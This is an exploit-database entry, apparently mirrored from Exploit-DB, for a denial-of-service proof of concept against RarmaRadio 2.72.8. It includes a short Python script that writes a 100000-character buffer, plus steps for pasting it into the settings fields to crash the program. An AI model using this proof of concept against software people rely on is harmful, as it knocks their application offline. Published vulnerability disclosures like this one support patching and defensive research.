header-logo
Suggest Exploit
vendor:
RarmaRadio
by:
Ismael Nava
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: RarmaRadio
Affected Version From: 2.72.8
Affected Version To: 2.75.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:raimersoft:rarmaradio
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home x64
2021

RarmaRadio 2.72.8 – Denial of Service (PoC)

RarmaRadio 2.72.8 is vulnerable to Denial of Service attack. By creating a new .txt file with a buffer of 100000 'Ñ' characters and pasting the content in the fields Username, Server, Port and User Agent, the application crashes.

Mitigation:

Update to the latest version of RarmaRadio
Source

Exploit-DB raw data:

# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC)
# Date: 2021-05-25
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe
# Version: 2.75.8
# Tested on: Windows 10 Home x64

#STEPS
# Open the program RarmaRadio
# Click in Edit and select Settings
# Click in Network option
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Lambda.txt"
# Paste the content in the fields Username, Server, Port and User Agent
# Click in OK
# End :)


buffer = 'Ñ' * 100000

try: 
    file = open("Lambda.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")